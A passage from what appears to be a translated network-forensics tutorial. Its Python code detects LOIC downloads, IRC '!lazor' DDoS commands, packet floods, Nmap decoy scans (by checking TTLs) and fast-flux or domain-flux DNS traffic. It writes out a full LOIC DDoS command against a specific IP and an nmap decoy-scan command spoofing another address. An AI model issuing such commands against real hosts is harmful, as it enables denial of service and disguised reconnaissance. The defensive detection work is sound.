                <span class="n">uri</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">uri</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span>
                <span class="k">if</span> <span class="s">".zip"</span> <span class="ow">in</span> <span class="n">uri</span> <span class="ow">and</span> <span class="s">"loic"</span> <span class="ow">in</span> <span class="n">uri</span><span class="p">:</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] {} Download LOIC."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">))</span>
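        <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span>
            <span class="c1"># Skip frames that are not IP/TCP or that do not carry a parsable HTTP request</span>
            <span class="k">pass</span>

<span class="c1"># "capture.pcap" is a placeholder path; dpkt needs the file opened in binary mode</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"capture.pcap"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span>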
<span class="n">pcap</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">pcap</span><span class="p">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">find_download</span><span class="p">(</span><span class="n">pcap</span><span class="p">)</span>
</code></pre></div></div>

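<h3 id="解析-hive-服务器上的-irc-命令">Parsing IRC Commands on the Hive Server</h3>

<p>A member of “Anonymous” logs in to a designated IRC server and issues an attack command such as <code class="language-plaintext highlighter-rouge">!lazor targetip=66.211.169.66 message=test_test port=80 method=tcp wait=false random=true start</code>. Every member whose LOIC client is connected to that IRC server in HIVEMIND mode starts attacking the target immediately.</p>

<p>In most cases an IRC server listens on TCP port 6667. Messages sent to the IRC server should therefore have destination TCP port 6667, and messages sent by the server should have source TCP port 6667.</p>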

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="k">def</span> <span class="nf">find_hivemind</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">dport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">dport</span>
            <span class="n">sport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">sport</span>
            <span class="k">if</span> <span class="n">dport</span> <span class="o">==</span> <span class="mi">6667</span><span class="p">:</span>
                <span class="c1"># tcp.data is bytes in Python 3, so search for a bytes literal</span>
                <span class="k">if</span> <span class="sa">b</span><span class="s">"!lazor"</span> <span class="ow">in</span> <span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">lower</span><span class="p">():</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] DDoS Hivemind issued by: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">))</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Target CMD: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">errors</span><span class="o">=</span><span class="s">"replace"</span><span class="p">)))</span>
            <span class="k">if</span> <span class="n">sport</span> <span class="o">==</span> <span class="mi">6667</span><span class="p">:</span>
                <span class="k">if</span> <span class="sa">b</span><span class="s">"!lazor"</span> <span class="ow">in</span> <span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">lower</span><span class="p">():</span>
                    <span class="c1"># Traffic from the server: the recipient is the destination address</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] DDoS Hivemind issued to: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">dst</span><span class="p">))</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Target CMD: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">errors</span><span class="o">=</span><span class="s">"replace"</span><span class="p">)))</span>
        <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span>
            <span class="c1"># Skip frames that are not IPv4/TCP</span>
            <span class="k">pass</span>
</code></pre></div></div>
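
<p>Once a <code class="language-plaintext highlighter-rouge">!lazor</code> line has been spotted, its parameters can be pulled apart for logging. The sketch below is only an illustration: the helper name <code class="language-plaintext highlighter-rouge">parse_lazor</code> is made up for this example, and it assumes the command is a space-separated list of <code class="language-plaintext highlighter-rouge">key=value</code> pairs plus bare words, as in the sample command above.</p>

```python
def parse_lazor(text):
    """Split the '!lazor ...' part of a message into (options, flags).

    Hypothetical helper: assumes space-separated key=value pairs and bare
    words such as 'start'. Returns None when no '!lazor' command is present.
    """
    idx = text.lower().find("!lazor")
    if idx == -1:
        return None
    options, flags = {}, []
    # Skip the '!lazor' token itself, then classify every remaining token
    for token in text[idx:].split()[1:]:
        if "=" in token:
            key, value = token.split("=", 1)
            options[key] = value
        else:
            flags.append(token)
    return options, flags


cmd = ("!lazor targetip=66.211.169.66 message=test_test port=80 "
       "method=tcp wait=false random=true start")
options, flags = parse_lazor(cmd)
print(options["targetip"], options["port"], options["method"], flags)
```

<p>With dpkt the payload arrives as bytes, so it would need to be decoded (for example with <code class="language-plaintext highlighter-rouge">tcp.data.decode(errors="replace")</code>) before being passed to this helper.</p>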

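<h3 id="实时监测-ddos-攻击">Detecting a DDoS Attack in Real Time</h3>

<p>To identify an attack, set a threshold for what counts as an abnormal number of packets. If one host sends more packets than that to a single address, treat it as a possible attack that deserves further investigation.</p>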

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="n">THRESH</span> <span class="o">=</span> <span class="mi">10000</span>
<span class="k">def</span> <span class="nf">find_attack</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="n">pkt_count</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">dport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">dport</span>
            <span class="k">if</span> <span class="n">dport</span> <span class="o">==</span> <span class="mi">80</span><span class="p">:</span>
                <span class="n">stream</span> <span class="o">=</span> <span class="s">"{}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">)</span>
                <span class="c1"># Count packets per source:destination pair</span>
                <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span> <span class="o">=</span> <span class="n">pkt_count</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span>
        <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span>
            <span class="c1"># Skip frames that are not IPv4/TCP</span>
            <span class="k">pass</span>

    <span class="c1"># Report every pair whose packet count exceeds the threshold</span>
    <span class="k">for</span> <span class="n">stream</span> <span class="ow">in</span> <span class="n">pkt_count</span><span class="p">:</span>
        <span class="n">pkts_sent</span> <span class="o">=</span> <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span>
        <span class="k">if</span> <span class="n">pkts_sent</span> <span class="o">&gt;</span> <span class="n">THRESH</span><span class="p">:</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">stream</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">stream</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} attacked {} with {} pkts."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pkts_sent</span><span class="p">)))</span>
</code></pre></div></div>
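
<p>The counting-and-threshold step can be tried without a capture file. The sketch below is a simplified stand-in, not the script above: <code class="language-plaintext highlighter-rouge">find_heavy_streams</code> is a hypothetical helper, the input is a synthetic list of (source, destination) pairs, and the addresses come from the documentation ranges.</p>

```python
from collections import Counter


def find_heavy_streams(pairs, thresh):
    """Return {(src, dst): count} for every pair seen more than `thresh` times."""
    counts = Counter(pairs)
    return {stream: n for stream, n in counts.items() if n > thresh}


# Synthetic (src, dst) pairs standing in for parsed packets
pairs = [("192.0.2.10", "198.51.100.5")] * 12 + [("192.0.2.11", "198.51.100.5")] * 3

for (src, dst), n in find_heavy_streams(pairs, thresh=10).items():
    print("[+] {} attacked {} with {} pkts.".format(src, dst, n))
```

<p>Keying the counter on a tuple rather than a <code class="language-plaintext highlighter-rouge">"src:dst"</code> string avoids having to split the key again when reporting.</p>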

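<h2 id="hdmoore-是如何解决五角大楼的麻烦的">How H.D. Moore Solved the Pentagon's Dilemma</h2>

<p>A coordinated and sophisticated series of attacks: <code class="language-plaintext highlighter-rouge">CIO Institute bulletin on computer security, 1999</code></p>

<p>Detecting an Nmap scan is easy, and the defender can also recover the attacker's IP address and, from it, the physical location of that address. An attacker, however, can use Nmap's advanced options: in a decoy scan, the scanning packets need not carry the attacker's own address and can instead carry IP addresses from many other places around the world.</p>

<p>Moore suggested analyzing the TTL field of every packet that came from the Nmap scans. The TTL (time-to-live) field of an IP packet shows how many hops the packet took before reaching its destination: each router that forwards a packet decrements the TTL by one. Moore realized that this was a good way to determine where the scans originated. For each source address logged in an Nmap scan, he sent an ICMP packet to measure the number of hops between that source and the scanned machine, and then used that information to pick out the real scanner. Only packets from the real scan source should carry a TTL consistent with that hop count; packets with forged source addresses should not. Moore named his tool Nlog because it logged a great deal of information from Nmap scan packets.</p>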

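<h3 id="理解-ttl-字段">Understanding the TTL Field</h3>

<p>The TTL field of an IP packet is 8 bits wide, so it can hold values from 0 to 255. When a computer sends an IP packet, it sets the TTL to the maximum number of hops the packet may traverse before reaching its destination. Each router the packet passes through decrements the TTL by one. When the TTL reaches zero, the router discards the packet, which prevents endless routing loops.</p>

<p>When decoy scans were introduced in Nmap 1.6, the TTL of the forged packets was neither randomized nor carefully calculated, and that is what allowed Moore to identify them. Nmap's code has since changed and randomizes the TTL with the algorithm below, which gives each packet a random TTL between 37 and 59, averaging about 48. The user can also fix the TTL with an optional argument.</p>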

<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Time to live</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ttl</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">){</span>
  <span class="n">my_ttl</span> <span class="o">=</span> <span class="p">(</span><span class="n">get_random_uint</span><span class="p">()</span> <span class="o">%</span> <span class="mi">23</span><span class="p">)</span> <span class="o">+</span> <span class="mi">37</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="n">my_ttl</span> <span class="o">=</span> <span class="n">ttl</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
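
<p>The range and average of that expression are easy to check. The short sketch below mirrors the arithmetic in Python; <code class="language-plaintext highlighter-rouge">decoy_ttl</code> is a name chosen for this illustration and is not part of Nmap.</p>

```python
def decoy_ttl(random_uint):
    """Mirror the C expression (get_random_uint() % 23) + 37 for a given value."""
    return (random_uint % 23) + 37


# Inputs 0..22 hit every possible remainder exactly once,
# so this list enumerates every TTL the expression can produce.
ttls = [decoy_ttl(r) for r in range(23)]
print(min(ttls), max(ttls), sum(ttls) / len(ttls))  # prints: 37 59 48.0
```

<p>A uniformly random input therefore yields TTLs from 37 to 59 with a mean of 48, which is where the "about 48" figure comes from.</p>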

<p>To run Nmap in decoy-scan mode, pass the -D option followed by an IP address. The <code class="language-plaintext highlighter-rouge">-ttl</code> option can additionally fix the TTL, here to 13.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap 192.168.1.7 <span class="nt">-D</span> 8.8.8.8 <span class="nt">-ttl</span> 13
</code></pre></div></div>

<p>On the target host 192.168.1.7, run tcpdump in verbose mode (-v) with name resolution disabled (-nn), showing only traffic that involves <code class="language-plaintext highlighter-rouge">8.8.8.8</code> (<code class="language-plaintext highlighter-rouge">host 8.8.8.8</code>). The output shows that nmap successfully sent forged packets with the spoofed address <code class="language-plaintext highlighter-rouge">8.8.8.8</code> and a TTL of 13.</p>

<h3 id="用-scapy-解析-ttl-字段的值">Parsing the TTL Field with Scapy</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">test_ttl</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">IP</span><span class="p">):</span>
            <span class="n">ipsrc</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span>
            <span class="n">ttl</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">ttl</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Pkt Received From: {} with TTL: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">,</span> <span class="n">ttl</span><span class="p">))</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
    
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">test_ttl</span><span class="p">,</span> <span class="n">store</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>Linux/Unix systems usually set the initial TTL to 64, while Windows sets it to 128.</p>

<p>Packets from internal/private IP addresses (<code class="language-plaintext highlighter-rouge">10.0.0.0~10.255.255.255</code>, <code class="language-plaintext highlighter-rouge">172.16.0.0~172.31.255.255</code>, and <code class="language-plaintext highlighter-rouge">192.168.0.0</code> ~ <code class="language-plaintext highlighter-rouge">192.168.255.255</code>) should all be excluded. To do this, import the IPy library. To avoid a clash between IPy's IP class and Scapy's IP class, import it under the name IPTEST. If <code class="language-plaintext highlighter-rouge">IPTEST(ipsrc).iptype()</code> returns <code class="language-plaintext highlighter-rouge">PRIVATE</code>, skip the check for that packet.</p>
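
<p>If IPy is not installed, the same filter can be approximated with Python's standard <code class="language-plaintext highlighter-rouge">ipaddress</code> module. This is a substitute for the IPy call, not the approach used in these notes; the helper name <code class="language-plaintext highlighter-rouge">is_private</code> is made up, and it deliberately tests only the three ranges listed above.</p>

```python
import ipaddress

# The three private ranges listed above, written as CIDR blocks
PRIVATE_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_private(ipsrc):
    """Return True when the IPv4 address falls inside one of the three ranges."""
    addr = ipaddress.ip_address(ipsrc)
    return any(addr in net for net in PRIVATE_NETS)


print(is_private("192.168.1.7"), is_private("172.32.0.1"), is_private("8.8.8.8"))
# prints: True False False
```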

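<p>Several packets may arrive from the same source address, and there is no need to check the same source twice. If the source address has not been seen before, build an IP packet addressed to it that carries an ICMP echo request, so that the host replies. Once it replies, store the TTL of the reply in a dictionary indexed by source IP address. Then compare the TTL of the packet originally received with this reference TTL and check whether the difference exceeds a threshold. Packets that take different paths to the target may cross a different number of routers, so their TTLs need not match exactly. If the hop counts differ by more than 5, however, the TTL can be presumed forged.</p>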

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">IPy</span> <span class="kn">import</span> <span class="n">IP</span> <span class="k">as</span> <span class="n">IPTEST</span>
<span class="n">ttl_values</span> <span class="o">=</span> <span class="p">{}</span>
<span class="n">THRESH</span> <span class="o">=</span> <span class="mi">5</span>

<span class="k">def</span> <span class="nf">check_ttl</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">,</span> <span class="n">ttl</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">IPTEST</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">).</span><span class="n">iptype</span><span class="p">()</span> <span class="o">==</span> <span class="s">"PRIVATE"</span><span class="p">:</span>
        <span class="k">return</span>
    <span class="k">if</span> <span class="n">ipsrc</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">ttl_values</span><span class="p">:</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">sr1</span><span class="p">(</span><span class="n">IP</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">ipsrc</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(),</span> <span class="n">retry</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">pkt</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
            <span class="c1"># No ICMP reply within the timeout, so there is no reference TTL to compare against</span>
            <span class="k">return</span>
        <span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">]</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ttl</span>
    <span class="k">if</span> <span class="nb">abs</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ttl</span><span class="p">)</span> <span class="o">-</span> <span class="nb">int</span><span class="p">(</span><span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">]))</span> <span class="o">&gt;</span> <span class="n">THRESH</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[!] Detected Possible Spoofed Packet From: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[!] TTL: {}, Actual TTL: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ttl</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">])))</span>
</code></pre></div></div>

<p>Although RFC 1700 recommends a default TTL of 64, Microsoft Windows has used an initial TTL of 128 since MS Windows NT 4.0. Some other Unix-like systems use different initial values as well; Solaris 2.x, for example, defaults to 255.</p>
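
<p>Given those defaults, a rough hop count can be inferred from a received TTL by assuming the sender started from the smallest common initial value that is not below it. The sketch below is a heuristic under that assumption only; <code class="language-plaintext highlighter-rouge">estimate_hops</code> and the list of candidate values (64, 128, 255) are illustrative choices taken from the defaults mentioned in these notes.</p>

```python
COMMON_INITIAL_TTLS = (64, 128, 255)  # defaults mentioned above; an assumption, not a complete list


def estimate_hops(observed_ttl):
    """Guess (initial_ttl, hops) for a received TTL value.

    Heuristic: take the smallest common initial TTL that is not below the
    observed value and treat the difference as the number of hops.
    """
    for initial in COMMON_INITIAL_TTLS:
        if initial >= observed_ttl:
            return initial, initial - observed_ttl
    raise ValueError("TTL does not fit in 8 bits: {}".format(observed_ttl))


print(estimate_hops(52))   # prints: (64, 12)
print(estimate_hops(116))  # prints: (128, 12)
print(estimate_hops(13))   # prints: (64, 51)
```

<p>The last case matches the fixed TTL of 13 used in the decoy-scan example: it implies about 51 hops from a host that started at 64, far more than the other cases, which is why such packets stand out.</p>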

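<h2 id="风暴storm-的-fast-flux-和-conficker-的-domain-flux">Storm's fast-flux and Conficker's domain-flux</h2>

<p>A technique called <code class="language-plaintext highlighter-rouge">fast-flux</code> uses Domain Name System (DNS) records to hide the command-and-control channel that directs the Storm botnet. DNS records normally translate a domain name into an IP address. When a DNS server returns a result, it also specifies a TTL, which tells the host how long the IP address can be treated as valid, so the name need not be resolved again during that time.</p>

<p>The attackers behind the Storm botnet changed the DNS records of their command-and-control servers very frequently. In fact, they used 2,000 redundant servers spread across 384 network providers in more than 50 countries. They rotated the IP address of the command-and-control server often and returned a very short TTL in DNS responses. This rapid cycling of IP addresses (fast-flux) made the botnet's command-and-control servers hard to locate.</p>

<p>Conficker, one of the most successful computer worms to date, spread through a vulnerability in the Windows Server Message Block (SMB) protocol. Once infected, a vulnerable machine contacted a command-and-control server for further instructions. Every three hours, however, Conficker generated a different batch of domain names from the current UTC date and time. For the third version of Conficker, this meant 50,000 domains every three hours. The attackers registered only a handful of those domains so that they resolved to real IP addresses. This made it very hard to intercept and block traffic involving the command-and-control servers. Because the technique rotates through domain names, researchers named it <code class="language-plaintext highlighter-rouge">domain-flux</code>.</p>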

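<h3 id="你的-dns-知道一些不为你所知的吗">Does Your DNS Know Something You Don't?</h3>

<p>Inspecting a DNS lookup with tcpdump shows the client sending a request to the DNS server. Specifically, the client generates a <code class="language-plaintext highlighter-rouge">DNS Question Record (DNSQR)</code> asking for the IPv4 address of a domain name. The server answers with a <code class="language-plaintext highlighter-rouge">DNS Resource Record (DNSRR)</code> that gives the domain's IP address.</p>

<h3 id="使用-scapy-解析-dns-流量">Parsing DNS Traffic with Scapy</h3>

<p>When examining these DNS packets with Scapy, the fields of interest are found in the DNSQR and DNSRR layers. A DNSQR holds the query name (qname), query type (qtype), and query class (qclass). The server replies with a matching DNSRR that holds the resource record name (rrname), type (type), resource record class (rclass), and TTL.</p>

<p>The European Network and Information Security Agency (ENISA) offers an excellent resource for analyzing network traffic: a bootable DVD ISO image that includes several network captures and exercises. Exercise 7 provides a pcap that demonstrates <code class="language-plaintext highlighter-rouge">fast-flux</code> behavior.</p>

<h3 id="用-scapy-找出-fast-flux-流量">Detecting <code class="language-plaintext highlighter-rouge">fast-flux</code> Traffic with Scapy</h3>

<p>The following Python script reads packets from a pcap file and extracts every packet that contains a DNSRR.</p>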

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">dns_records</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">handle_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">):</span>
        <span class="n">rrname</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">).</span><span class="n">rrname</span>
        <span class="n">rdata</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">).</span><span class="n">rdata</span>
        <span class="k">if</span> <span class="n">rrname</span> <span class="ow">in</span> <span class="n">dns_records</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">rdata</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">]:</span>
                <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">rdata</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
            <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">rdata</span><span class="p">)</span>
            
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">pkts</span> <span class="o">=</span> <span class="n">rdpcap</span><span class="p">(</span><span class="s">"fast_flux.pcap"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">pkts</span><span class="p">:</span>
        <span class="n">handle_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">dns_records</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} has {} unique IPs."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">dns_records</span><span class="p">[</span><span class="n">item</span><span class="p">])))</span>
</code></pre></div></div>
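
<p>The bookkeeping in that script can be exercised without Scapy or a capture file. The sketch below works on plain (name, address) pairs; the function names, the sample domains, and the cut-off <code class="language-plaintext highlighter-rouge">min_ips</code> are all assumptions made for illustration, and a sensible cut-off would have to be tuned against real traffic.</p>

```python
def unique_ips_per_name(answers):
    """Group (rrname, rdata) pairs into {rrname: set of distinct addresses}."""
    records = {}
    for rrname, rdata in answers:
        records.setdefault(rrname, set()).add(rdata)
    return records


def flag_fast_flux(records, min_ips):
    """Return the names that resolved to at least `min_ips` distinct addresses."""
    return sorted(name for name, ips in records.items() if len(ips) >= min_ips)


# Synthetic DNS answers using documentation-range addresses
answers = [
    ("flux.example.", "192.0.2.1"),
    ("flux.example.", "192.0.2.2"),
    ("flux.example.", "192.0.2.3"),
    ("flux.example.", "192.0.2.1"),      # repeat, counted once
    ("static.example.", "198.51.100.7"),
    ("static.example.", "198.51.100.7"),
]

records = unique_ips_per_name(answers)
for name in flag_fast_flux(records, min_ips=3):
    print("[+] {} has {} unique IPs.".format(name, len(records[name])))
```

<p>Storing the addresses in a set removes the need for the explicit membership check before each append.</p>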

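<h3 id="用-scapy-找出-domain-flux-流量">Detecting Domain Flux Traffic with Scapy</h3>

<p>Conficker uses <code class="language-plaintext highlighter-rouge">domain-flux</code>, so what we need to look for are server responses that return an error for unknown domain names. The DNS server cannot resolve most of the generated names to real IP addresses, and for those names it replies with an error. <code class="language-plaintext highlighter-rouge">domain-flux</code> can therefore be identified in real time by finding every DNS response that carries the name-error code.</p>

<p>Read the capture file again and examine each packet in turn. Check only packets that come from the server's port 53, since these contain the resource records. A DNS packet has an rcode field; an rcode of 3 means the domain name does not exist. Print each such name to the screen and update a counter of name requests that went unanswered.</p>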

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">dns_qrtest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">)</span> <span class="ow">and</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">)</span> <span class="ow">and</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">).</span><span class="n">sport</span> <span class="o">==</span> <span class="mi">53</span><span class="p">:</span>
        <span class="n">rcode</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNS</span><span class="p">).</span><span class="n">rcode</span>
        <span class="n">qname</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSQR</span><span class="p">).</span><span class="n">qname</span>
